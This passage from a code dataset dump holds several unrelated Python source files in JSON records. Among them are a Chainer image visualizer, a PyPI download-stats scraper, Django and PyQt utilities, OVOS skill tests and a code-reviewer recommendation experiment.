main()\n","repo_name":"dariadiatlova/emo-tts-data","sub_path":"src/profiler.py","file_name":"profiler.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10105861155","text":"#!/usr/bin/env python\n\nimport os\nimport random\n\nimport numpy as np\nfrom PIL import Image\n\nimport chainer\nimport chainer.cuda\nfrom chainer import Variable\n\n\ndef pix_out_image(updater, enc, dec, rows, cols, seed, dst):\n @chainer.training.make_extension()\n def make_image(trainer):\n np.random.seed(seed)\n n_images = rows * cols\n xp = enc.xp\n\n w_in = 256\n w_out = 256\n in_ch = 12\n out_ch = 3\n\n in_all = np.zeros((n_images, in_ch, w_in, w_in)).astype(\"i\")\n gt_all = 
np.zeros((n_images, out_ch, w_out, w_out)).astype(\"f\")\n gen_all = np.zeros((n_images, out_ch, w_out, w_out)).astype(\"f\")\n\n for it in range(n_images):\n batch = updater.get_iterator('test').next()\n batchsize = len(batch)\n\n x_in = xp.zeros((batchsize, in_ch, w_in, w_in)).astype(\"f\")\n t_out = xp.zeros((batchsize, out_ch, w_out, w_out)).astype(\"f\")\n\n for i in range(batchsize):\n x_in[i, :] = xp.asarray(batch[i][0])\n t_out[i, :] = xp.asarray(batch[i][1])\n x_in = Variable(x_in)\n\n z = enc(x_in)\n x_out = dec(z)\n\n in_all[it, :] = x_in.data[0, :]\n gt_all[it, :] = t_out[0, :]\n gen_all[it, :] = x_out.data[0, :]\n\n def save_image(x, name, mode=None):\n _, C, H, W = x.shape\n x = x.reshape((rows, cols, C, H, W))\n x = x.transpose(0, 3, 1, 4, 2)\n if C == 1:\n x = x.reshape((rows * H, cols * W))\n else:\n x = x.reshape((rows * H, cols * W, C))\n\n preview_dir = '{}/preview'.format(dst)\n preview_path = preview_dir + \\\n '/image_{}_{:0>8}.png'.format(name, trainer.updater.iteration)\n if not os.path.exists(preview_dir):\n os.makedirs(preview_dir)\n Image.fromarray(x, mode=mode).convert('RGB').save(preview_path)\n\n x = np.asarray(np.clip(gen_all * 128 + 128, 0.0, 255.0), dtype=np.uint8)\n save_image(x, \"gen\")\n\n x = np.ones((n_images, 3, w_in, w_in)).astype(np.uint8) * 255\n x[:, 0, :, :] = 0\n for i in range(12):\n x[:, 0, :, :] += np.uint8(15 * i * in_all[:, i, :, :])\n save_image(x, \"in\", mode='HSV')\n\n x = np.asarray(np.clip(gt_all * 128 + 128, 0.0, 255.0), dtype=np.uint8)\n save_image(x, \"gt\")\n\n return make_image\n\n\ndef star_out_image(updater, gen, dst, att_num=5, image_size=128, rows=4, cols=4, random_att=True):\n @chainer.training.make_extension()\n def make_image(trainer):\n xp = gen.xp\n n_images = rows * cols\n\n in_all = np.zeros((n_images, 3, image_size, image_size)).astype(\"f\")\n gen_all = np.zeros((n_images, 3, image_size, image_size)).astype(\"f\")\n\n def save_image(x, name, att, mode=None):\n _, C, H, W = x.shape\n x = x.reshape((rows, cols, C, H, W))\n x = x.transpose(0, 3, 1, 4, 2)\n if C == 1:\n x = x.reshape((rows * H, cols * W))\n else:\n x = x.reshape((rows * H, cols * W, C))\n\n preview_dir = '{}/preview'.format(dst)\n preview_path = preview_dir + \\\n '/image_{}_{:0>8}_{}.png'.format(name, trainer.updater.iteration, att)\n if not os.path.exists(preview_dir):\n os.makedirs(preview_dir)\n Image.fromarray(x, mode=mode).convert('RGB').save(preview_path)\n\n batch = updater.get_iterator('test').next()\n batchsize = len(batch)\n x_in = xp.zeros((batchsize, 3, image_size, image_size)).astype(\"f\")\n for i in range(batchsize):\n in_all[i, :] = x_in[i, :] = xp.asarray(batch[i][0])\n\n x_in = Variable(x_in)\n att = np.array([[int(k) for k in j]\n for j in [bin(i)[2:].zfill(att_num)\n for i in range(2 ** att_num)]]).astype(\"f\")\n if random_att:\n random_select = random.randint(0, len(att))\n att_part = xp.array(np.broadcast_to(att[random_select], (batchsize, att_num)))\n x_out = gen(x_in, att_part)\n\n for it in range(min(n_images, batchsize)):\n gen_all[it, :] = x_out.array[it, :]\n x = np.asarray(np.clip(gen_all * 128 + 128, 0.0, 255.0), dtype=np.uint8)\n save_image(x, \"gen\", random_select)\n else:\n for select in range(2 ** att_num):\n att_part = xp.array(np.broadcast_to(att[select], (batchsize, att_num)))\n x_out = gen(x_in, att_part)\n\n for it in range(min(n_images, batchsize)):\n gen_all[it, :] = x_out.array[it, :]\n x = np.asarray(np.clip(gen_all * 128 + 128, 0.0, 255.0), dtype=np.uint8)\n save_image(x, \"gen\", select)\n\n x = 
np.asarray(np.clip(in_all * 128 + 128, 0.0, 255.0), dtype=np.uint8)\n save_image(x, \"gt\", \"origin\")\n\n return make_image\n","repo_name":"AlongWY/HIT-WorkShop","sub_path":"ML/FaceGen/face_visualizer.py","file_name":"face_visualizer.py","file_ext":"py","file_size_in_byte":5024,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"10475792558","text":"import asyncio\nimport json\nimport time\nfrom datetime import date, timedelta\nfrom typing import Dict, Tuple, Union\n\nimport aiohttp\nfrom bs4 import BeautifulSoup\n\n\nLINKS: Dict[str, Tuple[str, str]] = {\n \"disnake\": (\n \"https://pypistats.org/packages/disnake\",\n \"https://api.pepy.tech/api/v2/projects/disnake\",\n ),\n \"nextcord\": (\n \"https://pypistats.org/packages/nextcord\",\n \"https://api.pepy.tech/api/v2/projects/nextcord\",\n ),\n \"pycord\": (\n \"https://pypistats.org/packages/py-cord\",\n \"https://api.pepy.tech/api/v2/projects/py-cord\",\n ),\n \"discord.py\": (\n \"https://pypistats.org/packages/discord.py\",\n \"https://api.pepy.tech/api/v2/projects/discord.py\",\n ),\n \"interactions.py\": (\n \"https://pypistats.org/packages/discord-py-interactions\",\n \"https://api.pepy.tech/api/v2/projects/discord-py-interactions\",\n ),\n \"hikari\": (\n \"https://pypistats.org/packages/hikari\",\n \"https://api.pepy.tech/api/v2/projects/hikari\",\n )\n}\n\n\nasync def parsing_pypi(library: str) -> dict:\n\n async with aiohttp.ClientSession() as session:\n\n async with session.get(url=LINKS[library][0]) as request:\n soup1 = BeautifulSoup(await request.text(), \"html.parser\")\n\n async with session.get(url=LINKS[library][1]) as request:\n reqs = await request.text()\n reqs = json.loads(reqs)\n\n div1 = soup1.find(\"div\", {\"class\": \"wrapper\"}).text.split()\n div1 = [num for num in div1 if num.replace(\",\", \"\").isdigit() or \".\" in num]\n\n last_day = f\"{date.today() - timedelta(days=1)}\"\n\n downloads_list = reqs[\"downloads\"][last_day]\n items_list = downloads_list.values()\n\n last_version2 = reqs[\"versions\"]\n last_version2.sort(key=lambda x: tuple((x.lstrip(\"v\") + \"z\").split(\".\")))\n last_version2 = last_version2[-1]\n try:\n if library == \"disnake\":\n\n return {\"last_version\": div1[0], \"downloads\": div1[1:], }, {\n \"last_version\": last_version2,\n \"total_downloads\": f\"{reqs['total_downloads']:,d}\",\n \"downloads_sum\": f\"{sum(items_list):,d}\",\n \"last_version_downloads\": f\"{downloads_list[last_version2]:,d}\",\n \"set\": last_day,\n }\n\n elif library == \"nextcord\":\n\n return {\"last_version\": div1[0], \"downloads\": div1[1:], }, {\n \"last_version\": last_version2,\n \"total_downloads\": f\"{reqs['total_downloads']:,d}\",\n \"downloads_sum\": f\"{sum(items_list):,d}\",\n \"last_version_downloads\": f\"{downloads_list[last_version2]:,d}\",\n \"set\": last_day,\n }\n\n elif library == \"pycord\":\n\n return {\"last_version\": div1[0], \"downloads\": div1[1:], }, {\n \"last_version\": last_version2,\n \"total_downloads\": f\"{reqs['total_downloads']:,d}\",\n \"downloads_sum\": f\"{sum(items_list):,d}\",\n \"last_version_downloads\": f\"{downloads_list[last_version2]:,d}\",\n \"set\": last_day,\n }\n elif library == \"discord.py\":\n\n return {\"last_version\": div1[0], \"downloads\": div1[1:], }, {\n \"last_version\": last_version2,\n \"total_downloads\": f\"{reqs['total_downloads']:,d}\",\n \"downloads_sum\": f\"{sum(items_list):,d}\",\n \"last_version_downloads\": f\"{downloads_list[last_version2]:,d}\",\n \"set\": 
last_day,\n            }\n\n        elif library == \"interactions.py\":\n\n            return {\"last_version\": div1[0], \"downloads\": div1[1:], }, {\n                \"last_version\": last_version2,\n                \"total_downloads\": f\"{reqs['total_downloads']:,d}\",\n                \"downloads_sum\": f\"{sum(items_list):,d}\",\n                \"last_version_downloads\": f\"{downloads_list[last_version2]:,d}\",\n                \"set\": last_day,\n            }\n\n        elif library == \"hikari\":\n\n            last_version2 = [i for i in reqs['versions']\n                             if len(i) == 12 and 'dev' in i]\n            last_version2.sort(key=lambda x: tuple((x + \"z\").split(\".\")))\n            last_version2 = last_version2[-1]\n\n            return {\"last_version\": div1[0], \"downloads\": div1[1:], }, {\n                \"last_version\": last_version2,\n                \"total_downloads\": f\"{reqs['total_downloads']:,d}\",\n                \"downloads_sum\": f\"{sum(items_list):,d}\",\n                \"last_version_downloads\": f\"{downloads_list[last_version2]:,d}\",\n                \"set\": last_day,\n            }\n    except Exception:\n        return \"not working\"\n\n\nasync def parsing_downloads(library: str) -> Dict[str, int]:\n    async with aiohttp.request(\"GET\", LINKS[library][1]) as response:\n        response = await response.text()\n        response = json.loads(response)\n\n    downloads_list = response['downloads']\n\n    dates = [f\"{date.today() - timedelta(days=i)}\" for i in range(1, 31)]\n\n    return {date: sum(downloads_list[date].values()) for date in dates}\n","repo_name":"ViZus-s/Libstats-bot","sub_path":"parsers/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"36580424112","text":"import requests\r\nimport json\r\n\r\nTOKEN_STR = 'procon30_example_token' # placeholder token\r\nHOST = '127.0.0.1' # placeholder\r\nPORT = '57557' # placeholder\r\n\r\n# fetch pre-match information\r\ntoken = {'Authorization' : TOKEN_STR}\r\nmatch = requests.get('http://' + HOST + ':' + PORT + '/matches', headers=token)\r\n\r\n# debug\r\nprint(match) # show the HTTP response: 401 = failure, 200 = success\r\nprint(match.text) # JSON text\r\n\r\nmatch_json = json.loads(match.text)","repo_name":"nnct-jo-ken/procon2019_kyogi","sub_path":"http_sample.py","file_name":"http_sample.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28104333644","text":"from django.core.management.base import BaseCommand, CommandError\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import Group\nfrom django.db import transaction\n\nUser = get_user_model()\n\n\nclass Command(BaseCommand):\n    help = 'Adds a number of users to a specified batch.'\n\n    def add_arguments(self, parser):\n        parser.add_argument('limit', type=int)\n        parser.add_argument('batch', type=str)\n\n    def handle(self, *args, **options):\n        limit = options['limit']\n        batch = options['batch']\n\n        batch = Group.objects.filter(name=batch).first()\n        if not batch:\n            raise CommandError('Batch name does not exist.')\n\n        users = User.objects.all().order_by('date_joined')\n\n        print('Ready to start.')\n        with transaction.atomic():\n            for user in users:\n                if limit < 1:\n                    break\n                if user.groups.all():\n                    continue\n\n                user.groups.add(batch)\n                print(f'Added {user.username}')\n                limit -= 1\n\n        self.stdout.write(self.style.SUCCESS(f'Successfully added {options[\"limit\"] - limit} 
users'))\n","repo_name":"favourch/coretabs-academy","sub_path":"src/api/accounts/management/commands/preparebatch.py","file_name":"preparebatch.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27551100264","text":"#base62 tools (convert number <=> string)\n# v1.0/20130109\n# python 2.x/3.x supported\n#\n#author: Ady Liu(imxylz@gmail.com)\n#github: github.com/adyliu\n\nimport sys\nfrom Lab5.settings import CREATED_URL_MAX_LENGTH\n\nbasedigits='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'\nBASE=len(basedigits)\n\n\ndef decode(s):\n    ret,mult = 0,1\n    for c in reversed(s):\n        ret += mult*basedigits.index(c)\n        mult *= BASE\n    return ret\n\ndef encode(num):\n    if num <0: raise Exception(\"positive number required: \" + str(num))\n    ret=''\n    while num != 0:\n        ret = (basedigits[num%BASE])+ret\n        num = int(num/BASE)\n    while len(ret) < CREATED_URL_MAX_LENGTH:\n        ret = '0' + ret\n    return ret\n","repo_name":"noavarice/Lab5","sub_path":"FileHandler/base62.py","file_name":"base62.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70154501354","text":"import json\nimport unittest\nfrom unittest.mock import Mock\n\nfrom ovos_bus_client import Message\n\nfrom ovos_workshop.skills.ovos import OVOSSkill\nfrom ovos_workshop.skills.mycroft_skill import MycroftSkill, is_classic_core\nfrom mycroft.skills import MycroftSkill as CoreSkill\nfrom ovos_utils.messagebus import FakeBus\nfrom os.path import dirname\nfrom ovos_workshop.skill_launcher import SkillLoader\n\n\nclass LegacySkill(CoreSkill):\n    def __init__(self, skill_name=\"LegacySkill\", bus=None, **kwargs):\n        self.inited = True\n        self.initialized = False\n        self.startup_called = False\n        super().__init__(skill_name, bus, **kwargs)\n        # __new__ calls `_startup` so this should be defined in __init__\n        assert self.skill_id is not None\n\n    def initialize(self):\n        self.initialized = True\n\n    def _startup(self, bus, skill_id=\"\"):\n        self.startup_called = True\n        self.initialize()\n\n\nclass BadLegacySkill(LegacySkill):\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        print(self.bus) # not set, exception in property\n\n\nclass GoodLegacySkill(CoreSkill):\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        print(self.bus) # maybe not set, exception in property\n\n\nclass SpecificArgsSkill(OVOSSkill):\n    def __init__(self, skill_id=\"SpecificArgsSkill\", bus=None, **kwargs):\n        self.inited = True\n        self.initialized = False\n        self.startup_called = False\n        super().__init__(skill_id=skill_id, bus=bus, **kwargs)\n        self.kwargs = kwargs\n\n    def initialize(self):\n        self.initialized = True\n\n    def _startup(self, bus, skill_id=\"\"):\n        self.startup_called = True\n        self.initialize()\n\n\nclass KwargSkill(OVOSSkill):\n    def __init__(self, **kwargs):\n        self.inited = True\n        self.initialized = False\n        self.startup_called = False\n        super().__init__(**kwargs)\n\n    def initialize(self):\n        self.initialized = True\n\n    def _startup(self, bus, skill_id=\"\"):\n        self.startup_called = True\n        self.initialize()\n\n\nclass TestSkill(unittest.TestCase):\n    def setUp(self):\n        self.bus = FakeBus()\n        self.bus.emitted_msgs = []\n\n        def get_msg(msg):\n            msg = json.loads(msg)\n            self.bus.emitted_msgs.append(msg)\n\n        self.bus.on(\"message\", get_msg)\n\n        self.skill = SkillLoader(self.bus, f\"{dirname(__file__)}/ovos_tskill_abort\")\n        self.skill.skill_id 
= \"abort.test\"\n self.bus.emitted_msgs = []\n\n self.skill.load()\n\n def test_skill_id(self):\n self.assertTrue(isinstance(self.skill.instance, OVOSSkill))\n self.assertTrue(isinstance(self.skill.instance, MycroftSkill))\n\n self.assertEqual(self.skill.skill_id, \"abort.test\")\n\n if not is_classic_core():\n # the metaclass ensures this returns True under ovos-core\n # but we have no control over mycroft-core so can not patch isinstance checks there\n self.assertTrue(isinstance(self.skill.instance, CoreSkill))\n\n # if running in ovos-core every message will have the skill_id in context\n for msg in self.bus.emitted_msgs:\n if msg[\"type\"] == 'mycroft.skills.loaded': # emitted by SkillLoader, not by skill\n continue\n self.assertEqual(msg[\"context\"][\"skill_id\"], \"abort.test\")\n\n def test_intent_register(self):\n padatious_intents = [\"abort.test:test.intent\",\n \"abort.test:test2.intent\",\n \"abort.test:test3.intent\"]\n for msg in self.bus.emitted_msgs:\n if msg[\"type\"] == \"padatious:register_intent\":\n self.assertTrue(msg[\"data\"][\"name\"] in padatious_intents)\n\n def test_registered_events(self):\n registered_events = [e[0] for e in self.skill.instance.events]\n\n # intent events\n intent_triggers = [f\"{self.skill.skill_id}:test.intent\",\n f\"{self.skill.skill_id}:test2.intent\",\n f\"{self.skill.skill_id}:test3.intent\"\n ]\n for event in intent_triggers:\n self.assertTrue(event in registered_events)\n\n # base skill class events shared with mycroft-core\n default_skill = [\"mycroft.skill.enable_intent\",\n \"mycroft.skill.disable_intent\",\n \"mycroft.skill.set_cross_context\",\n \"mycroft.skill.remove_cross_context\",\n \"mycroft.skills.settings.changed\"]\n for event in default_skill:\n self.assertTrue(event in registered_events)\n\n # base skill class events exclusive to ovos-core\n if not is_classic_core():\n default_ovos = [f\"{self.skill.skill_id}.converse.ping\",\n f\"{self.skill.skill_id}.converse.request\",\n \"intent.service.skills.activated\",\n \"intent.service.skills.deactivated\",\n f\"{self.skill.skill_id}.activate\",\n f\"{self.skill.skill_id}.deactivate\"]\n for event in default_ovos:\n self.assertTrue(event in registered_events)\n\n def test_stop(self):\n skill = self.skill.instance\n handle_stop = Mock()\n real_stop = skill.stop\n skill.stop = Mock()\n self.bus.once(f\"{self.skill.skill_id}.stop\", handle_stop)\n self.bus.emit(Message(\"mycroft.stop\"))\n handle_stop.assert_called_once()\n self.assertEqual(handle_stop.call_args[0][0].context['skill_id'],\n skill.skill_id)\n skill.stop.assert_called_once()\n\n skill.stop = real_stop\n\n def tearDown(self) -> None:\n self.skill.unload()\n\n\nclass TestSkillNew(unittest.TestCase):\n def test_legacy(self):\n bus = FakeBus()\n\n # a legacy skill accepts wrong args, but accepts kwargs\n legacy = LegacySkill(\"LegacyName\", bus, skill_id=\"legacy.mycroft\")\n self.assertTrue(legacy.inited)\n self.assertTrue(legacy.initialized)\n self.assertTrue(legacy.startup_called)\n self.assertIsNotNone(legacy.skill_id)\n self.assertEqual(legacy.bus, bus)\n\n # a legacy skill not accepting args at all\n with self.assertRaises(Exception) as ctxt:\n BadLegacySkill() # accesses self.bus in __init__\n self.assertTrue(\"Accessed MycroftSkill.bus in __init__\" in str(ctxt.exception))\n\n legacynoargs = LegacySkill() # no exception this time because bus is not used in init\n self.assertTrue(legacynoargs.inited)\n self.assertFalse(legacynoargs.initialized)\n self.assertFalse(legacynoargs.startup_called)\n\n # a legacy 
skill fully initialized at once\n        legacy = GoodLegacySkill(skill_id=\"legacy.mycroft\", bus=bus) # accesses self.bus in __init__\n        self.assertEqual(legacy.skill_id, \"legacy.mycroft\")\n        self.assertEqual(legacy.bus, bus)\n\n    def test_load(self):\n        bus = FakeBus()\n        kwarg = KwargSkill(skill_id=\"kwarg\", bus=bus)\n        self.assertTrue(kwarg.inited)\n        self.assertTrue(kwarg.initialized)\n        self.assertTrue(kwarg.startup_called)\n        self.assertEqual(kwarg.skill_id, \"kwarg\")\n        self.assertEqual(kwarg.bus, bus)\n\n        gui = Mock()\n        args = SpecificArgsSkill(\"args\", bus, gui=gui)\n        self.assertTrue(args.inited)\n        self.assertTrue(args.initialized)\n        self.assertTrue(args.startup_called)\n        self.assertEqual(args.skill_id, \"args\")\n        self.assertEqual(args.bus, bus)\n        self.assertEqual(args.gui, gui)\n","repo_name":"OpenVoiceOS/OVOS-workshop","sub_path":"test/unittests/test_skill.py","file_name":"test_skill.py","file_ext":"py","file_size_in_byte":7678,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"42665645275","text":"import math\nimport os\nimport time\nfrom common.utils import read_info\nfrom storage.utils import *\nfrom common import algorithms\nimport json\nfrom common.settings import PROJECT_NAME\nfrom multiprocessing import Pool\n\nfrom common.log import LogAdapter\nLOG = LogAdapter().set_log('CrossProject')\n\n\nclass TokenProcess(object):\n    def __init__(self, project_name):\n        file_name = project_name.split('/')[1]\n        self.file_name = '{}.csv'.format(file_name)\n        self.project_name = project_name\n\n    def get_request_token(self, train_start_number):\n        \"\"\"\n\n        :param train_start_number: first pull request number used for training\n        :return: get token dict by pull request\n        \"\"\"\n        token = self.__get_all_token()\n        token_dict = dict()\n        file_name = get_file_name(self.project_name,train_start_number)\n        for key, value in file_name.items():\n            request_token = []\n            # the key is the pull request number and the value is that pull request's file list\n            # print(key)\n            for file in value:\n                # if the token list does not contain this file, fall back to an empty list\n                file_token = token.get(file,[])\n                request_token.extend(file_token)\n            # drop duplicate tokens\n            request_token = list(set(request_token))\n            token_dict.update({key: request_token})\n        request_token_dict = dict(sorted(token_dict.items(),key=lambda items: items[0]))\n        return request_token_dict\n\n    def __get_all_token(self):\n        path = os.getcwd()\n        path = os.path.dirname(path)\n        csv_path = os.path.join(path, 'sample', self.file_name)\n        result = read_info(csv_path)\n        return result\n\n\nclass Algorithms(object):\n    def __init__(self,project_name):\n        self.project_name = project_name\n\n    def main(self, Rn, Rp, reviewer, k):\n        time1 = time.time()\n        review_dict = {}\n        lib_tech_new = list(Rn.values())[0]\n        for key, value in Rp.items():\n            lib_tech_past = list(value)\n            past_review = reviewer.get(key)\n            if not lib_tech_past or not lib_tech_new or not past_review:\n                continue\n            score = algorithms.cosine_similarity(lib_tech_new, lib_tech_past)\n            for rpv in past_review:\n                if rpv not in review_dict.keys():\n                    review_dict.setdefault(rpv, score)\n                else:\n                    past_score = review_dict.get(rpv)\n                    review_dict.update({rpv: past_score + score})\n        candidate_list_sort = sorted(review_dict.items(), key=lambda item: item[1], reverse=True)\n        # print('---length is ',len(candidate_list_sort))\n        split_list = candidate_list_sort[0:k]\n        predict = candidate_list_sort[0:10]\n        if not split_list:\n            print('No Result')\n        result = [i[0] for i in split_list]\n        time2 = time.time()\n        spend_time = time2 - time1\n        
print('spend time is {}'.format(spend_time))\n        return result,predict\n\n\ndef main(project_name,train_time):\n    time1 = time.time()\n    train_start_number = get_train_start_number(project_name,train_time)\n\n    reviewer = get_reviewer(project_name)\n    test_number = get_test_number(project_name)\n\n    app = TokenProcess(project_name)\n    all_token = app.get_request_token(train_start_number)\n    alg = Algorithms(project_name)\n\n    save_file_name = project_name.split('/')[1] + '_cross' +train_time.replace('-','_')\n\n    invalid_id = []\n    judge_dict1 = {'right': 0, 'wrong': 0,'all': 0}\n    judge_dict3 = {'right': 0, 'wrong': 0,'all': 0}\n    judge_dict5 = {'right': 0, 'wrong': 0,'all': 0}\n\n    for i in test_number:\n\n        judge_dict1['all'] += 1\n        judge_dict3['all'] += 1\n        judge_dict5['all'] += 1\n\n        r = reviewer.get(i)\n        if not r:\n            invalid_id.append(i)\n            with open('{}.txt'.format(save_file_name), 'a') as f:\n                f.write(json.dumps({i: 'this pull request has no comments!'}))\n                f.write('\\n')\n            continue\n\n        token_info = all_token.get(i)\n        new_token = {i: all_token.get(i)}\n        # no tokens means this pull request's files have no import info\n        if not token_info:\n            invalid_id.append(i)\n            with open('{}.txt'.format(save_file_name), 'a') as f:\n                f.write(json.dumps({i: 'this pull request files have no import info!'}))\n                f.write('\\n')\n            continue\n\n        past_token = {k: v for k, v in all_token.items() if (k < i)}\n        result, predict = alg.main(new_token, past_token, reviewer, 5)\n        result1,result3,result5 = [result[0]],result[0:3], result\n        with open('{}.txt'.format(save_file_name), 'a') as f:\n            f.write(json.dumps({i: predict}))\n            f.write('\\n')\n\n        # print(result)\n        # print(r)\n        # Check whether the two lists share any elements, and collect them.\n        compare_result1 = set(result1) & set(r)\n        compare_result3 = set(result3) & set(r)\n        compare_result5 = set(result5) & set(r)\n\n        print('result1', compare_result1)\n        print('result3', compare_result3)\n        print('result5', compare_result5)\n\n        # print(compare_result)\n\n        if compare_result1:\n            judge_dict1['right'] += 1\n        else:\n            judge_dict1['wrong'] += 1\n\n        if compare_result3:\n            judge_dict3['right'] += 1\n        else:\n            judge_dict3['wrong'] += 1\n\n        if compare_result5:\n            judge_dict5['right'] += 1\n        else:\n            judge_dict5['wrong'] += 1\n\n    time2 = time.time()\n    spend_time = time2 - time1\n\n    rate1 = '{:.2%}'.format(judge_dict1['right'] / (judge_dict1['right'] + judge_dict1['wrong']))\n    rate3 = '{:.2%}'.format(judge_dict3['right'] / (judge_dict3['right'] + judge_dict3['wrong']))\n    rate5 = '{:.2%}'.format(judge_dict5['right'] / (judge_dict5['right'] + judge_dict5['wrong']))\n    with open('{}.txt'.format(save_file_name), 'a') as f:\n        f.write(json.dumps(rate1))\n        f.write(json.dumps(rate3))\n        f.write(json.dumps(rate5))\n        f.write('\\n')\n        f.write('Total spend time is {}'.format(spend_time))\n\n    value_dict1 = {'project:{} rate1:{}'.format(project_name, rate1): judge_dict1}\n    value_dict3 = {'project:{} rate3:{}'.format(project_name, rate3): judge_dict3}\n    value_dict5 = {'project:{} rate5:{}'.format(project_name, rate5): judge_dict5}\n\n    with open('{}_rate.txt'.format(save_file_name), 'a') as f:\n        f.write('{}\\n'.format(json.dumps(value_dict1)))\n        f.write('{}\\n'.format(json.dumps(value_dict3)))\n        f.write('{}\\n'.format(json.dumps(value_dict5)))\n        f.write('Spend Time is {}'.format(spend_time))\n\n    # LOG.info(value_dict1,value_dict3,value_dict5)\n    print('Spend Time is {}'.format(spend_time))\n\n\nif __name__ == '__main__':\n    if not PROJECT_NAME:\n        print('No Project Name set.....')\n    else:\n        project_name_list = PROJECT_NAME\n        pool = Pool()\n        for project in project_name_list:\n            
print(project)\n            train_time = [ONE_YEAR,HALF_YEAR,THREE_MONTH,ONE_MONTH]\n            for i in train_time:\n                print(i)\n                pool.apply_async(main, (project, i))\n                # main(project,i)\n\n        pool.close()\n        pool.join()\n","repo_name":"huyuanzhe/EmperimentalEvaluation","sub_path":"core/cross_project.py","file_name":"cross_project.py","file_ext":"py","file_size_in_byte":7264,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"42315052375","text":"from PyQt4.QtGui import *\r\nfrom PyQt4.QtCore import *\r\n\r\nclass ComboListView(QListView):\r\n    def __init__(self, p, cb):\r\n        QListView.__init__(self, p)\r\n        self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\r\n        self.setSelectionMode(QAbstractItemView.SingleSelection)\r\n\r\n    def showEvent(self, e):\r\n        if qVersion() < '4.2': \r\n            QListView.showEvent(self, e)\r\n            return\r\n        e.accept()\r\n        model = self.model()\r\n        rows = model.rowCount()\r\n        col = self.modelColumn()\r\n        mx = 0\r\n\r\n        for i in range(0, rows):\r\n            item = model.item(i, col)\r\n            mx = max(mx, item.sizeHint().width())\r\n        if rows:\r\n            sz = QSize(mx, item.sizeHint().height())\r\n            for i in range(0, rows):\r\n                model.item(i, col).setSizeHint(sz)\r\n\r\n        mx += 25\r\n\r\n        if mx > self.parent().parent().width():\r\n            self.setGeometry(self.pos().x(), self.pos().y(), \r\n                mx, self.height())\r\n            self.parent().setGeometry(self.parent().pos().x(),\r\n                self.parent().pos().y(), mx, self.parent().height())\r\n        QListView.showEvent(self, e)\r\n\r\n    def keyPressEvent(self, e):\r\n        if (e.key() == Qt.Key_Tab or e.key() == Qt.Key_Backtab):\r\n            e.accept()\r\n            ev = QKeyEvent(QEvent.KeyPress, e.key(), e.modifiers(),\r\n                e.text(), e.isAutoRepeat(), e.count())\r\n            QApplication.postEvent(self.parent().parent(),ev)\r\n            return\r\n        QListView.keyPressEvent(self, e)\r\n\r\n    def event(self, e):\r\n        if e.type() == QEvent.ShortcutOverride and e.key() == Qt.Key_Escape:\r\n            self.clearSelection()\r\n        return QListView.event(self, e)\r\n\r\n    def focusOutEvent(self, e):\r\n        # from the focus events posted at our combobox, we must...\r\n        combobox = self.parent().parent()\r\n        if e.reason() in (Qt.TabFocusReason, Qt.BacktabFocusReason,):\r\n            combobox.hidePopup()\r\n            idxs = self.selectedIndexes()\r\n            if len(idxs) > 0 and combobox.currentIndex() != idxs[0].row():\r\n                combobox.setCurrentIndex(idxs[0].row())\r\n                combobox.emit(SIGNAL(\"activated(int)\"),combobox.currentIndex())\r\n                combobox.emit(SIGNAL(\"activated(const QString &)\"),\r\n                    combobox.currentText())\r\n        QListView.focusOutEvent(self, e)\r\n","repo_name":"tomkins/spellcraftcalc","sub_path":"ComboListView.py","file_name":"ComboListView.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"465396029","text":"# coding: utf-8\nfrom __future__ import unicode_literals, absolute_import, division, print_function\n\nimport pytest\nfrom hamcrest import has_entry, assert_that\n\nfrom common.models.geo import Settlement, Country\nfrom common.tester.factories import create_station, create_settlement\nfrom travel.rasp.train_api.serialization.segment_station import SegmentStationSchema\n\n\npytestmark = pytest.mark.dbuser\n\n\ndef test_segment_station_schema():\n    station = create_station(id=20, title='Название', popular_title='Популярное название',\n                             settlement=Settlement.MOSCOW_ID, country=Country.RUSSIA_ID)\n\n    result = {\n        'id': 20,\n        'title': 'Название',\n        'popularTitle': 'Популярное название',\n        'settlementId': Settlement.MOSCOW_ID,\n        'timezone': 'Europe/Moscow',\n        'country': None\n    }\n\n    assert SegmentStationSchema().dump(station)[0] == result\n    result['codes'] = 
